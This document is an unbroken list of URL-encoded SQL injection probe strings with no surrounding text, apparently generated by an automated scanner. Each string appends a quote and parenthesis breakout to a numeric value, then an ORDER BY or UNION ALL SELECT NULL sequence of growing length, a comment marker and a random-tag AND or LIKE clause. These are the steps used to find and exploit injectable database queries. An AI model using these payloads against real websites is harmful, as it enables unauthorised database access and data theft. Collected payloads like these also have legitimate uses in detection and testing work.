1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%27aEXC%27%3D%27aEXC 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ltzO%27%3D%27ltzO 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mFBV%27%3D%27mFBV 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mBBE%27%3D%27mBBE 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27dkMN%27%3D%27dkMN 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27sUwm%27%3D%27sUwm 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27AXuU%27%3D%27AXuU 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SqGg%27%3D%27SqGg 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Anqo%27%3D%27Anqo 1234.5%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27JnBB%27%3D%27JnBB 1234.5%27%29%29%20ORDER%20BY%204759--%20%20AND%20%28%28%27vUSH%27%3D%27vUSH 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%27IvOb%27%3D%27IvOb 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%27OcLq%27%3D%27OcLq 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27JCiS%27%3D%27JCiS 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27JCYN%27%3D%27JCYN 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27nibl%27%3D%27nibl 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27QHGO%27%3D%27QHGO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Qmxs%27%3D%27Qmxs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ILrN%27%3D%27ILrN 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27mBlr%27%3D%27mBlr 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27eyQj%27%3D%27eyQj 1234.5%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27olkK%27%3D%27olkK 1234.5%27%29%29%29%20ORDER%20BY%201812--%20%20AND%20%28%28%28%27TlHi%27%3D%27TlHi 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%27vXpV%27%3D%27vXpV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27nnjJ%27%3D%27nnjJ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Idyq%27%3D%27Idyq 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pIMF%27%3D%27pIMF 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ORhB%27%3D%27ORhB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27OIEb%27%3D%27OIEb 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Ljit%27%3D%27Ljit 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27gWPo%27%3D%27gWPo 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27pYaY%27%3D%27pYaY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27rcKQ%27%3D%27rcKQ 1234.5%27%20ORDER%20BY%201--%20%20AND%20%27FojX%27%3D%27FojX 1234.5%27%20ORDER%20BY%203455--%20%20AND%20%27VxWC%27%3D%27VxWC 1234.5%27%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%27Eqxk%27%3D%27Eqxk 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%27IXsN%27%3D%27IXsN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27RHJw%27%3D%27RHJw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27HCsL%27%3D%27HCsL 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27hrJf%27%3D%27hrJf 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27mkrt%27%3D%27mkrt 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27kpCN%27%3D%27kpCN 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27RbBV%27%3D%27RbBV 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27GPEZ%27%3D%27GPEZ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27whlQ%27%3D%27whlQ 1234.5%27%29%20ORDER%20BY%201--%20%20AND%20%28%27HrZs%27%20LIKE%20%27HrZs 1234.5%27%29%20ORDER%20BY%204885--%20%20AND%20%28%27lVXv%27%20LIKE%20%27lVXv 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%27EocG%27%20LIKE%20%27EocG 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%27uAtA%27%20LIKE%20%27uAtA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27yuzp%27%20LIKE%20%27yuzp 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27KcjQ%27%20LIKE%20%27KcjQ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27xyph%27%20LIKE%20%27xyph 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27NxcK%27%20LIKE%20%27NxcK 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27CCKn%27%20LIKE%20%27CCKn 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Epnt%27%20LIKE%20%27Epnt 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mlMe%27%20LIKE%20%27mlMe 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27pbsX%27%20LIKE%20%27pbsX 1234.5%27%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%27QhDr%27%20LIKE%20%27QhDr 1234.5%27%29%29%20ORDER%20BY%209892--%20%20AND%20%28%28%27ifbI%27%20LIKE%20%27ifbI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%27NYyY%27%20LIKE%20%27NYyY 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%27GCQV%27%20LIKE%20%27GCQV 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27KHMG%27%20LIKE%20%27KHMG 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27blRw%27%20LIKE%20%27blRw 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27JSWW%27%20LIKE%20%27JSWW 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27aAYO%27%20LIKE%20%27aAYO 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27OCPy%27%20LIKE%20%27OCPy 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27cgNZ%27%20LIKE%20%27cgNZ 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27TxZg%27%20LIKE%20%27TxZg 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27BOpQ%27%20LIKE%20%27BOpQ 1234.5%27%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%27IogQ%27%20LIKE%20%27IogQ 1234.5%27%29%29%29%20ORDER%20BY%203322--%20%20AND%20%28%28%28%27FIXE%27%20LIKE%20%27FIXE 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%27mXOf%27%20LIKE%20%27mXOf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27uiWO%27%20LIKE%20%27uiWO 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27IcVf%27%20LIKE%20%27IcVf 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TIXo%27%20LIKE%20%27TIXo 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EtwH%27%20LIKE%20%27EtwH 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xYPS%27%20LIKE%20%27xYPS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bEWC%27%20LIKE%20%27bEWC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27eKAi%27%20LIKE%20%27eKAi 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hKOS%27%20LIKE%20%27hKOS 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27gcra%27%20LIKE%20%27gcra 1234.5%27%20ORDER%20BY%201--%20%20AND%20%27tlOz%27%20LIKE%20%27tlOz 1234.5%27%20ORDER%20BY%207921--%20%20AND%20%27BXKP%27%20LIKE%20%27BXKP 1234.5%27%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%27zcvw%27%20LIKE%20%27zcvw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%27agDw%27%20LIKE%20%27agDw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27aeRm%27%20LIKE%20%27aeRm 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27vjKo%27%20LIKE%20%27vjKo 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27xXIM%27%20LIKE%20%27xXIM 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27bdYS%27%20LIKE%20%27bdYS 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27rOyb%27%20LIKE%20%27rOyb 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27jigg%27%20LIKE%20%27jigg 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27RSAw%27%20LIKE%20%27RSAw 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27QaBJ%27%20LIKE%20%27QaBJ 1234.5%22%29%20ORDER%20BY%201--%20%20AND%20%28%22zhyC%22%3D%22zhyC 1234.5%22%29%20ORDER%20BY%202092--%20%20AND%20%28%22WlRj%22%3D%22WlRj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%22Dedc%22%3D%22Dedc 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%22PUif%22%3D%22PUif 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22NxmT%22%3D%22NxmT 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22uSIO%22%3D%22uSIO 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22DRSJ%22%3D%22DRSJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nvQC%22%3D%22nvQC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22GtCs%22%3D%22GtCs 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22WCqx%22%3D%22WCqx 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22qlhT%22%3D%22qlhT 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22aoBC%22%3D%22aoBC 1234.5%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22OakZ%22%3D%22OakZ 1234.5%22%29%29%20ORDER%20BY%209803--%20%20AND%20%28%28%22Upeo%22%3D%22Upeo 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%22etjf%22%3D%22etjf 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%22AGCu%22%3D%22AGCu 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22FxKj%22%3D%22FxKj 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22VteR%22%3D%22VteR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Jvrr%22%3D%22Jvrr 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22swAd%22%3D%22swAd 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22wSsh%22%3D%22wSsh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22wKoY%22%3D%22wKoY 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22frhz%22%3D%22frhz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22gxAk%22%3D%22gxAk 1234.5%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22HVYy%22%3D%22HVYy 1234.5%22%29%29%29%20ORDER%20BY%206246--%20%20AND%20%28%28%28%22zTIy%22%3D%22zTIy 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%28%22QmTo%22%3D%22QmTo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pDUF%22%3D%22pDUF 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22FhYo%22%3D%22FhYo 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22GnEN%22%3D%22GnEN 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22mGAg%22%3D%22mGAg 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22LoAB%22%3D%22LoAB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22VtNw%22%3D%22VtNw 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22PoaP%22%3D%22PoaP 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22auKr%22%3D%22auKr 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Wiol%22%3D%22Wiol 1234.5%22%20ORDER%20BY%201--%20%20AND%20%22mtwP%22%3D%22mtwP 1234.5%22%20ORDER%20BY%203134--%20%20AND%20%22wfEI%22%3D%22wfEI 1234.5%22%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%22nloJ%22%3D%22nloJ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%22PiHV%22%3D%22PiHV 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Lkji%22%3D%22Lkji 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nRjU%22%3D%22nRjU 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22qyLa%22%3D%22qyLa 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XCwp%22%3D%22XCwp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22NkUH%22%3D%22NkUH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22pPhA%22%3D%22pPhA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22olUp%22%3D%22olUp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22EEci%22%3D%22EEci 1234.5%22%29%20ORDER%20BY%201--%20%20AND%20%28%22UhFX%22%20LIKE%20%22UhFX 1234.5%22%29%20ORDER%20BY%207940--%20%20AND%20%28%22KwlZ%22%20LIKE%20%22KwlZ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%22Wysw%22%20LIKE%20%22Wysw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%22fufJ%22%20LIKE%20%22fufJ 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22OXSj%22%20LIKE%20%22OXSj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22FNXe%22%20LIKE%20%22FNXe 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Boki%22%20LIKE%20%22Boki 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tGKK%22%20LIKE%20%22tGKK 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22VAXk%22%20LIKE%20%22VAXk 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22eJvL%22%20LIKE%20%22eJvL 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22mavR%22%20LIKE%20%22mavR 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22kblE%22%20LIKE%20%22kblE 1234.5%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22JouJ%22%20LIKE%20%22JouJ 1234.5%22%29%29%20ORDER%20BY%202322--%20%20AND%20%28%28%22kaoO%22%20LIKE%20%22kaoO 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%22hVqk%22%20LIKE%20%22hVqk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%22psdC%22%20LIKE%20%22psdC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22Pzhp%22%20LIKE%20%22Pzhp 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22WzeQ%22%20LIKE%20%22WzeQ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22fLiT%22%20LIKE%20%22fLiT 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22LOaA%22%20LIKE%20%22LOaA 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22rGmQ%22%20LIKE%20%22rGmQ 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22hVMb%22%20LIKE%20%22hVMb 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22cOKH%22%20LIKE%20%22cOKH 